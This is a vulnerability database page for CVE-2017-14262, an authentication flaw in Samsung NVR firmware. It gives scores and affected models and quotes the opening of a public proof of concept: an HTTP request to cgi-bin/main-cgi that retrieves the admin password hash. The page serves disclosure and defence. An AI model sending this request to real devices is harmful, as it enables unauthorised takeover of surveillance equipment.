Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.3
CVSSv2

CVE-2017-14262

Published: 11/09/2017 Updated: 03/10/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2
VMScore: 828
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Subscribe to Srn 1670d Firmware

Vulnerability Summary

On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

samsung srn_1670d_firmware -

samsung srn_1000_firmware -

samsung srn_472s_firmware -

samsung srn_470d_firmware -

Github Repositories

https://github.com/zzz66686/CVE-2017-14262

Samsung_NVR_vul CVE-2017-14262 xfuturesec Co, Ltd First, get the MD5 hash password of the 'admin' account Send: GET 192168114/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/11 Host: 192168114 User-Agent: Mozilla/50 (Windows NT 63; WOW64

References

CWE-326https://github.com/zzz66686/Samsung_NVR_vulhttps://nvd.nist.govhttps://github.com/zzz66686/CVE-2017-14262
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-38028CVE-2024-32406CVE-2024-25624IMAPCVE-2024-2310CVE-2024-0874CVE-2024-20359XXEremote code execution
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook